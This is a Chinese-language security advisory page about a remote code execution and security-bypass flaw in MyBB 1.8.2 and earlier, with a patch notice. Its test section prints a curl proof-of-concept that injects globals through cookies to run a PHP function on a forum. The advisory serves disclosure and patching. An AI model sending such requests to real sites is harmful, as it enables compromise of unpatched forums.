当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

MyBB远程代码执行及安全限制绕过漏洞

     发表日期:2014-12-05 10:35:53

MyBB远程代码执行及安全限制绕过漏洞

BugTraq-ID:71273

发布日期:2014-03-06

更新日期:2014-11-26

受影响系统:

MyBB MyBB

详细信息:

MyBB是一个功能完整并且非常实用的论坛软件。

MyBB 1.8.2及之前版本上存在远程代码执行漏洞及安全限制绕过漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码并绕过安全限制。

来源:

Taoguang Chen

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.example.com/

解决办法:

厂商补丁:

MyBB

----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mybb.com/